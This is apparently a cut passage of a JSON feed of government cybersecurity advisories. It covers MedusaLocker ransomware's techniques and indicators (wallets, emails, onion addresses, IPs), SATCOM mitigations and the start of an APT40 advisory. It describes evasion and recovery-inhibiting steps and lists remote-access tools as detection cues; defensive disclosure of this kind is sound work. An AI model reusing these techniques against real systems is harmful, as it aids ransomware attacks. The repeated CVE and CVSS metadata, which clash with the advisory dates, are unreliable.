"privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Advanced Persistent Threat Actors Targeting U.S. 
Think Tanks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-12-01T12:00:00", "id": "AA20-336A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-336a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:54:21", "description": "### Summary\n\n**Actions to take today to mitigate cyber threats from ransomware:** \n\u2022 Prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Train users to recognize and report phishing attempts. \n\u2022 Enable and enforce multifactor authentication.\n\n_Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing [#StopRansomware](<https://www.cisa.gov/stopransomware/stopransomware>) effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. 
Visit [stopransomware.gov](<https://www.cisa.gov/stopransomware>) to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) are releasing this CSA to provide information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims\u2019 networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom, and the developer, who receives the remainder. \n\n### Technical Details\n\nMedusaLocker ransomware actors most often gain access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations [[T1133](<https://attack.mitre.org/versions/v11/techniques/T1133/>)]. Actors also frequently use email phishing and spam email campaigns\u2014directly attaching the ransomware to the email\u2014as initial intrusion vectors [[T1566](<https://attack.mitre.org/versions/v11/techniques/T1566/>)].\n\nMedusaLocker ransomware uses a batch file to execute PowerShell script `invoke-ReflectivePEInjection` [[T1059.001](<https://attack.mitre.org/versions/v11/techniques/T1059/001/>)]. 
This script propagates MedusaLocker throughout the network by editing the `EnableLinkedConnections` value within the infected machine\u2019s registry, which then allows the infected machine to detect attached hosts and networks via Internet Control Message Protocol (ICMP) and to detect shared storage via Server Message Block (SMB) Protocol. \n\nMedusaLocker then: \n\n * Restarts the `LanmanWorkstation` service, which allows registry edits to take effect. \n * Kills the processes of well-known security, accounting, and forensic software. \n * Restarts the machine in safe mode to avoid detection by security software [[T1562.009](<https://attack.mitre.org/versions/v11/techniques/T1562/009>)].\n * Encrypts victim files with the AES-256 encryption algorithm; the resulting key is then encrypted with an RSA-2048 public key [[T1486](<https://attack.mitre.org/versions/v11/techniques/T1486/>)]. \n * Runs every 60 seconds, encrypting all files except those critical to the functionality of the victim\u2019s machine and those that already have the designated encrypted file extension. \n * Establishes persistence by copying an executable (`svhost.exe` or `svhostt.exe`) to the `%APPDATA%\\Roaming` directory and scheduling a task to run the ransomware every 15 minutes. \n * Attempts to prevent standard recovery techniques by deleting local backups, disabling startup recovery options, and deleting shadow copies [[T1490](<https://attack.mitre.org/versions/v11/techniques/T1490/>)].\n\nMedusaLocker actors place a ransom note into every folder containing a file with the victim's encrypted data. The note outlines how to communicate with the MedusaLocker actors, typically providing victims one or more email addresses at which the actors can be reached. The size of MedusaLocker ransom demands appears to vary depending on the victim\u2019s financial status as perceived by the actors. 
\n\n\n#### **Indicators of Compromise**\n\nEncrypted File Extensions \n--- \n.1btc | .matlock20 | .marlock02 | .readinstructions \n.bec | .mylock | .jpz.nz | .marlock11 \n.cn | .NET1 | .key1 | .fileslocked \n.datalock | .NZ | .lock | .lockfilesUS \n.deadfilesgr | .tyco | .lockdata7 | .rs \n.faratak | .uslockhh | .lockfiles | .tyco \n.fileslock | .zoomzoom | .perfection | .uslockhh \n.marlock13 | n.exe | .Readinstruction | .marlock08 \n.marlock25 | nt_lock20 | .READINSTRUCTION | \n.marlock6 | .marlock01 | .ReadInstructions | \n \nRansom Note File Names \n--- \nhow_to_ recover_data.html | how_to_recover_data.html.marlock01 \ninstructions.html | READINSTRUCTION.html \n!!!HOW_TO_DECRYPT!!! | How_to_recovery.txt \nreadinstructions.html | readme_to_recover_files \nrecovery_instructions.html | HOW_TO_RECOVER_DATA.html \nrecovery_instruction.html | \n \nPayment Wallets \n--- \n14oxnsSc1LZ5M2cPZeQ9rFnXqEvPCnZikc \n1DRxUFhvJjGUdojCzMWSLmwx7Qxn79XbJq \n18wRbb94CjyTGkUp32ZM7krCYCB9MXUq42 \n1AbRxRfP6yHePpi7jmDZkS4Mfpm1ZiatH5 \n1Edcufenw1BB4ni9UadJpQh9LVx9JGtKpP \n1DyMbw6R9PbJqfUSDcK5729xQ57yJrE8BC \n184ZcAoxkvimvVZaj8jZFujC7EwR3BKWvf \n14oH2h12LvQ7BYBufcrY5vfKoCq2hTPoev \nbc1qy34v0zv6wu0cugea5xjlxagsfwgunwkzc0xcjj \nbc1q9jg45a039tn83jk2vhdpranty2y8tnpnrk9k5q \nbc1qz3lmcw4k58n79wpzm550r5pkzxc2h8rwmmu6xm \n1AereQUh8yjNPs9Wzeg1Le47dsqC8NNaNM \n1DeNHM2eTqHp5AszTsUiS4WDHWkGc5UxHf \n1HEDP3c3zPwiqUaYuWZ8gBFdAQQSa6sMGw \n1HdgQM9bjX7u7vWJnfErY4MWGBQJi5mVWV \n1nycdn9ebxht4tpspu4ehpjz9ghxlzipll \n12xd6KrWVtgHEJHKPEfXwMVWuFK4k1FCUF \n1HZHhdJ6VdwBLCFhdu7kDVZN9pb3BWeUED \n1PormUgPR72yv2FRKSVY27U4ekWMKobWjg \n14cATAzXwD7CQf35n8Ea5pKJPfhM6jEHak \n1PopeZ4LNLanisswLndAJB1QntTF8hpLsD \n \nEmail Addresses \n--- \nwillyhill1960@tutanota[.]com | unlockfile@cock[.]li \nzlo@keem[.]ne | unlockmeplease@airmail[.]cc \nzlo@keemail[.]me | unlockmeplease@protonmail[.]com \nzlo@tfwno[.]gf | willyhill1960@protonmail[.]com \nsupport@ypsotecs[.]com | support@imfoodst[.]com \n \nEmail Addresses \n--- 
\ntraceytevin@protonmail[.]com | support@itwgset[.]com \nunlock_file@aol[.]com | support@novibmaker[.]com \nunlock_file@outlook[.]com | support@securycasts[.]com \nsupport@exoprints[.]com | rewmiller-1974@protonmail[.]com \nsupport@exorints[.]com | rpd@keemail[.]me \nsupport@fanbridges[.]com | soterissylla@wyseil[.]com \nsupport@faneridges[.]com | support@careersill[.]com \nperfection@bestkoronavirus[.]com | karloskolorado@tutanota[.]com \npool1256@tutanota[.]com | kevynchaz@protonmail[.]com \nrapid@aaathats3as[.]com | korona@bestkoronavirus[.]com \nrescuer@tutanota[.]com | lockPerfection@gmail[.]com \nithelp01@decorous[.]cyou | lockperfection@gmail[.]com \nithelp01@wholeness[.]business | mulierfagus@rdhos[.]com \nithelp02@decorous[.]cyou | [rescuer]@cock[.]li \nithelp02@wholness[.]business | 107btc@protonmail[.]com \nithelpresotre@outlook[.]com | 33btc@protonmail[.]com \ncmd@jitjat[.]org | 777decoder777@protonmail[.]com \ncoronaviryz@gmail[.]com | 777decoder777@tfwno[.]gf \ndec_helper@dremno[.]com | andrewmiller-1974@protonmail[.]com \ndec_helper@excic[.]com | angelomartin-1980@protonmail[.]com \ndec_restore@prontonmail[.]com | ballioverus@quocor[.]com \ndec_restore1@outlook[.]com | beacon@jitjat[.]org \nbitcoin@sitesoutheat[.]com | beacon@msgsafe[.]io \nbriansalgado@protonmail[.]com | best666decoder@tutanota[.]com \nbugervongir@outlook[.]com | bitcoin@mobtouches[.]com \nbest666decoder@protonmail[.]com | encrypt2020@outlook[.]com \ndecoder83540@cock[.]li | fast-help@inbox[.]lv \ndecra2019@gmail[.]com | fuc_ktheworld1448@outlook[.]com \ndiniaminius@winrof[.]com | fucktheworld1448@cock[.]li \ndirhelp@keemail[.]me | gartaganisstuffback@gmail[.]com \n \nEmail Addresses \n--- \nemaila.elaich@iav.ac[.]ma | gavingonzalez@protonmail[.]com \nemd@jitjat[.]org | gsupp@onionmail[.]org \nencrypt2020@cock[.]li | gsupp@techmail[.]info \nbest666decoder@protonmail[.]com | helper@atacdi[.]com \nithelp@decorous[.]cyou | helper@buildingwin[.]com \nithelp@decorous[.]cyoum | 
helprestore@outlook[.]com \nithelp@wholeness[.]business | helptorestore@outlook[.]com \n \nTOR Addresses \n--- \nhttp://gvlay6u4g53rxdi5.onion/6-iSm1B1Ehljh8HYuXGym4Xyu1WdwsR2Av-6tXiw1BImsqoLh7pd207Rl6XYoln7sId \nhttp://gvlay6u4g53rxdi5.onion/8-grp514hncgblilsjtd32hg6jtbyhlocr5pqjswxfgf2oragnl3pqno6fkqcimqin \nhttp://gvlay6y4g53rxdi5.onion/21-8P4ZLCsMETPaLw9MkSlXJsNZWdHe0rxjt-XmBgZLWlm5ULGFCOJFuVdEymmxysofwu \nhttp://gvlay6u4g53rxdi5.onion/2l-8P4ZLCsMTPaLw9MkSlXJsNZWdHeOrxjtE9lck1MuXPYo29daQys6gomZZXUImN7Z \nhttp://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-DcaE9HeHywqSHvdcIwOndCS4PuWASX8g \nhttp://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-kB4rQXGKyxGiLyw7YDsMKSBjyfdwcyxo \nhttp://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-bET6JbB9vEMZ7qYBPqUMCxOQExFx4iOi \nhttp://gvlay6u4g53rxdi5. onion/8-MO0Q7O97Hgxvm1YbD7OMnimImZJXEWaG-RbH4TvdwVTGQB3X6VOUOP3lgO6YOJEOW \nhttp://gvlay6u4g53rxdi5.onion/8-gRp514hncgb1i1sjtD32hG6jTbUh1ocR-Uola2Fo30KTJvZX0otYZgTh5txmKwUNe \nhttp://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-OWQwD1w1Td7hY7IGUUjxmHMoFSQW6blg \nhttp://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-uGHwkkWCoUtBbZWN50sSS4Ds8RABkrKy \nhttp://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-Tj3PRnQlpHc9OftRVDGAWUulvE80yZbc \nhttp://gvlay6u4g53rxdi5.onion/8-Ww5sCBhsL8eM4PeAgsfgfa9lrqa81r31-tDQRZCAUe4164X532j9Ky16IBN9StWTH \nhttp://gvlay6u4g53rxdi5.onion/21-wIq5kK9gGKiTmyups1U6fABj1VnXIYRB-I5xek6PG2EbWlPC7C1rXfsqJBlWlFFfY \nqd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion \nhttp://medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion/leakdata/[REDACTED] \n \n**Disclaimer: **Many of these observed IP addresses are several years old and have been historically linked to MedusaLocker ransomware. 
We recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.\n\n**IP Address** | **Last Observed** \n---|--- \n195.123.246.138 | Nov-2021 \n138.124.186.221 | Nov-2021 \n159.223.0.9 | Nov-2021 \n45.146.164.141 | Nov-2021 \n185.220.101.35 | Nov-2021 \n185.220.100.249 | Sep-2021 \n50.80.219.149 | Sep-2021 \n185.220.101.146 | Sep-2021 \n185.220.101.252 | Sep-2021 \n179.60.150.97 | Sep-2021 \n84.38.189.52 | Sep-2021 \n94.232.43.63 | Jul-2021 \n108.11.30.103 | Apr-2021 \n194.61.55.94 | Apr-2021 \n198.50.233.202 | Apr-2021 \n40.92.90.105 | Jan-2021 \n188.68.216.23 | Dec-2020 \n87.251.75.71 | Dec-2020 \n196.240.57.20 | Oct-2020 \n198.0.198.5 | Aug-2020 \n194.5.220.122 | Mar-2020 \n194.5.250.124 | Mar-2020 \n194.5.220.124 | Mar-2020 \n104.210.72.161 | Nov-2019 \n \n### MITRE ATT&CK Techniques\n\nMedusaLocker actors use the ATT&CK techniques listed in Table 1.\n\n_Table 1: MedusaLocker Actors ATT&CK Techniques for Enterprise_\n\n_**Initial Access**_ \n--- \n**Technique Title** | **ID** | **Use** \nExternal Remote Services | T1133 | MedusaLocker actors gained access to victim devices through vulnerable RDP configurations. \nPhishing | T1566 | MedusaLocker actors used phishing and spearphishing to obtain access to victims' networks. \n_**Execution**_ \n**Technique Title** | **ID** | **Use** \nCommand and Scripting Interpreter: PowerShell | T1059.001 | MedusaLocker actors may abuse PowerShell commands and scripts for execution. \n_**Defense Evasion**_ \n**Technique Title** | **ID** | **Use** \nImpair Defenses: Safe Mode Boot | T1562.009 | MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. 
\n_**Impact**_ \n**Technique Title** | **ID** | **Use** \nData Encrypted for Impact | T1486 | MedusaLocker actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. \nInhibit System Recovery | T1490 | MedusaLocker actors may deny access to operating systems containing features that can help fix corrupted systems, such as backup catalog, volume shadow copies, and automatic repair. \n \n### Mitigations\n\n * Implement a recovery plan that maintains and retains multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n * Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.\n * Regularly back up data and password protect backup copies stored offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.\n * Install, regularly update, and enable real time detection for antivirus software on all hosts.\n * Install updates for operating systems, software, and firmware as soon as possible.\n * Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.\n * Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege. 
\n * Disable unused ports.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Enforce multifactor authentication (MFA).\n * Use National Institute of Standards and Technology (NIST) standards for developing and managing password policies: \n * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n * Store passwords in hashed format using industry-recognized password managers.\n * Add password user \u201csalts\u201d to shared login credentials.\n * Avoid reusing passwords.\n * Implement multiple failed login attempt account lockouts.\n * Disable password \u201chints\u201d.\n * Refrain from requiring password changes unless there is evidence of password compromise. **Note:** NIST guidance suggests favoring longer passwords and no longer requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d that cyber criminals can easily decipher.\n * Require administrator credentials to install software.\n * Only use secure networks; avoid using public Wi-Fi networks.\n * Consider installing and using a virtual private network (VPN) to establish secure remote connections.\n * Focus on cybersecurity awareness and training. 
Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities, such as ransomware and phishing scams.\n\n### Resources\n\n * Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide\n * No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment\n\n### Reporting\n\n * To report an incident and request technical assistance, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ) or 888-282-0870, or the FBI through a local field office. \n * Financial institutions must ensure compliance with any applicable Bank Secrecy Act requirements, including suspicious activity reporting obligations. Indicators of compromise (IOCs), such as suspicious email addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. For more information on mandatory and voluntary reporting of cyber events via SARs, see FinCEN Advisory FIN-2016-A005, _[Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime](<https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a005>)_, October 25, 2016; and FinCEN Advisory FIN-2021-A004, _[Advisory on Ransomware and the Use of the Financial System to Facilitate Ransom Payments](<https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2021-a004>)_, November 8, 2021, which updates FinCEN Advisory FIN-2020-A006.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. 
See the [RFJ website](<https://www.state.gov/rewards-for-justice/>) for more information and how to report information securely.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To report incidents and anomalous activity or to request incident response resources or technical assistance related to this threat, contact CISA at [report@cisa.gov](<mailto:report@cisa.gov>).\n\n### Revisions\n\nJune 30, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-08-11T12:00:00", "type": "ics", "title": "#StopRansomware: MedusaLocker", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2023-26360"], "modified": "2022-08-11T12:00:00", "id": "AA22-181A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:56:06", "description": "### Summary\n\n_Updated May 10, 2022: The U.S. government attributes this threat activity to Russian state-sponsored malicious cyber actors. Additional information may be found in a [statement from the State Department](<https://www.state.gov/attribution-of-russias-malicious-cyber-activity-against-ukraine/>). For more information on Russian malicious cyber activity, refer to [cisa.gov/uscert/russia](<https://www.cisa.gov/uscert/russia>)._\n\n_Actions to Take Today:_ \n\u2022 Use secure methods for authentication. \n\u2022 Enforce principle of least privilege. \n\u2022 Review trust relationships. \n\u2022 Implement encryption. \n\u2022 Ensure robust patching and system configuration audits. \n\u2022 Monitor logs for suspicious activity. \n\u2022 Ensure incident response, resilience, and continuity of operations plans are in place.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers\u2019 customer environments.\n\nGiven the current geopolitical situation, CISA\u2019s [Shields Up](<https://www.cisa.gov/shields-up>) initiative requests that all organizations significantly lower their threshold for reporting and sharing indications of malicious cyber activity. 
To that end, CISA and FBI will update this joint Cybersecurity Advisory (CSA) as new information becomes available so that SATCOM providers and their customers can take additional mitigation steps pertinent to their environments.\n\nCISA and FBI strongly encourage critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the mitigations outlined in this CSA to strengthen SATCOM network cybersecurity.\n\n### Mitigations\n\nCISA and FBI strongly encourage critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the following mitigations:\n\n#### **Mitigations for SATCOM Network Providers**\n\n * Put in place **additional monitoring at ingress and egress points** to SATCOM equipment to look for anomalous traffic, such as: \n * The presence of insecure remote access tools\u2014such as Teletype Network Protocol (Telnet), File Transfer Protocol (FTP), Secure Shell Protocol (SSH), Secure Copy Protocol (SCP), and Virtual Network Computing (VNC)\u2014facilitating communications to and from SATCOM terminals.\n * Network traffic from SATCOM networks to other unexpected network segments.\n * Unauthorized use of local or backup accounts within SATCOM networks.\n * Unexpected SATCOM terminal to SATCOM terminal traffic.\n * Network traffic from the internet to closed group SATCOM networks.\n * Brute force login attempts over SATCOM network segments.\n * See the Office of the Director of National Intelligence (ODNI) [Annual Threat Assessment of the U.S. 
Intelligence Community, February 2022](<https://www.dni.gov/files/ODNI/documents/assessments/ATA-2022-Unclassified-Report.pdf>) for specific state-sponsored cyber threat activity relating to SATCOM networks.\n\n#### **Mitigations for SATCOM Network Providers and Customers**\n\n * **Use secure methods for authentication,** including multifactor authentication where possible, for all accounts used to access, manage, and/or administer SATCOM networks. \n * Use and enforce strong, complex passwords: Review password policies to ensure they align with the [latest NIST guidelines](<https://csrc.nist.gov/publications/detail/sp/800-63b/final>). \n * **Do not use default credentials or weak passwords.**\n * Audit accounts and credentials: remove terminated or unnecessary accounts; change expired credentials.\n * **Enforce principle of least privilege through authorization policies.** Minimize unnecessary privileges for identities. Consider privileges assigned to individual personnel accounts, as well as those assigned to non-personnel accounts (e.g., those assigned to software or systems). Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.\n * **Review trust relationships.** Review existing trust relationships with IT service providers. Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data. \n * Remove unnecessary trust relationships. \n * Review contractual relationships with all service providers. Ensure contracts include appropriate provisions addressing security, such as those listed below, and that these provisions are appropriately leveraged: \n * Security controls the customer deems appropriate. 
\n * Provider should have in place appropriate monitoring and logging of provider-managed customer systems.\n * Customer should have in place appropriate monitoring of the service provider\u2019s presence, activities, and connections to the customer network.\n * Notification of confirmed or suspected security events and incidents occurring on the provider\u2019s infrastructure and administrative networks.\n * **Implement independent encryption** across all communications links leased from, or provided by, your SATCOM provider. See National Security Agency (NSA) Cybersecurity Advisory: [Protecting VSAT Communications](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2910409/nsa-issues-recommendations-to-protect-vsat-communications/>) for guidance.\n * Strengthen the security of **operating systems, software, and firmware.**\n * Ensure robust **vulnerability management and patching** practices are in place and, after testing, immediately patch known exploited vulnerabilities included in CISA's [living catalog of known exploited vulnerabilities](<https://cisa.gov/known-exploited-vulnerabilities>). These vulnerabilities carry significant risk to federal agencies as well as public and private sector entities. \n * Implement rigorous **configuration management programs.** Ensure the programs can track and mitigate emerging threats. Regularly audit system configurations for misconfigurations and security weaknesses.\n * **Monitor network logs for suspicious activity** and unauthorized or unusual login attempts. \n * Integrate SATCOM traffic into existing network security monitoring tools.\n * Review logs of systems behind SATCOM terminals for suspicious activity.\n * Ingest system and network generated logs into your enterprise security information and event management (SIEM) tool. 
\n * Implement endpoint detection and response (EDR) tools where possible on devices behind SATCOM terminals, and ingest into the SIEM.\n * Expand and enhance monitoring of network segments and assets that use SATCOM.\n * Expand monitoring to include ingress and egress traffic transiting SATCOM links and monitor for suspicious or anomalous network activity. \n * Baseline SATCOM network traffic to determine what is normal and investigate deviations, such as large spikes in traffic.\n * Create, maintain, and exercise a **cyber incident response plan, resilience plan**, and continuity of operations plan so that critical functions and operations can be kept running if technology systems\u2014including SATCOM networks\u2014are disrupted or need to be taken offline.\n\n### Contact Information\n\nAll organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n\n### Resources\n\n * National Security Agency (NSA) Cybersecurity Advisory: [Protecting VSAT Communications](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2910409/nsa-issues-recommendations-to-protect-vsat-communications/>)\n * NSA Cybersecurity Technical Report: [Network Infrastructure Security Guidance](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2949885/nsa-details-network-infrastructure-best-practices/>)\n * Office of the Director of National Intelligence (ODNI): [Annual Threat Assessment of the U.S. 
Intelligence Community, February 2022](<https://www.dni.gov/files/ODNI/documents/assessments/ATA-2022-Unclassified-Report.pdf>)\n * CISA Tip: [Choosing and Protecting Passwords](<https://www.cisa.gov/uscert/ncas/tips/ST04-002>)\n * CISA Capacity Enhancement Guide: [Implementing Strong Authentication](<https://www.cisa.gov/capacity-enhancement-guides-federal-agencies>)\n\n### Revisions\n\nMarch 17, 2022: Initial Version | May 10, 2022: Added Attribution\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-05-10T12:00:00", "type": "ics", "title": "Strengthening Cybersecurity of SATCOM Network Providers and Customers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2022-05-10T12:00:00", "id": "AA22-076A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-076a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:00:11", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to provide 
information on a Chinese Advanced Persistent Threat (APT) group known in open-source reporting as APT40. This advisory provides APT40\u2019s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help cybersecurity practitioners identify and remediate APT40 intrusions and established footholds.\n\nAPT40\u2014aka BRONZE MOHAWK, FEVERDREAM, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MUDCARP, Periscope, Temp.Periscope, and Temp.Jumper\u2014is located in Haikou, Hainan Province, People\u2019s Republic of China (PRC), and has been active since at least 2009. APT40 has targeted governmental organizations, companies, and universities in a wide range of industries\u2014including biomedical, robotics, and maritime research\u2014across the United States, Canada, Europe, the Middle East, and the South China Sea area, as well as industries included in China\u2019s Belt and Road Initiative.\n\nOn July 19, 2021, the U.S. Department of Justice (DOJ) unsealed an indictment against four APT40 cyber actors for their illicit computer network exploitation (CNE) activities via front company Hainan Xiandun Technology Development Company (Hainan Xiandun). Hainan Xiandun employee Wu Shurong cooperated with and carried out orders from PRC Ministry of State Security (MSS) Hainan State Security Department (HSSD) intelligence officers Ding Xiaoyang, Zhu Yunmin, and Cheng Qingmin to conduct CNE. Wu\u2019s CNE activities resulted in the theft of trade secrets, intellectual property, and other high-value information from companies and organizations in the United States and abroad, as well as from multiple foreign governments. 
These MSS-affiliated actors targeted victims in the following industries: academia, aerospace/aviation, biomedical, defense industrial base, education, government, healthcare, manufacturing, maritime, research institutes, and transportation (rail and shipping).\n\nClick here for a PDF version of this report.\n\n_(Updated July 19, 2021)_\n\nClick here for indicators of compromise (IOCs) in STIX format. **Note:** to uncover malicious activity, incident responders search for IOCs in network- and host-based artifacts and assess the results\u2014eliminating false positives during the assessment. For example, some MD5 IOCs in the STIX file identify legitimate tools\u2014such as Putty, cmd.exe, svchost.exe, etc.\u2014as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more incident handling guidance.\n\n### Technical Details\n\n_This Joint Cybersecurity Advisory uses the MITRE ATT&CK\u00ae framework, version 9. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor 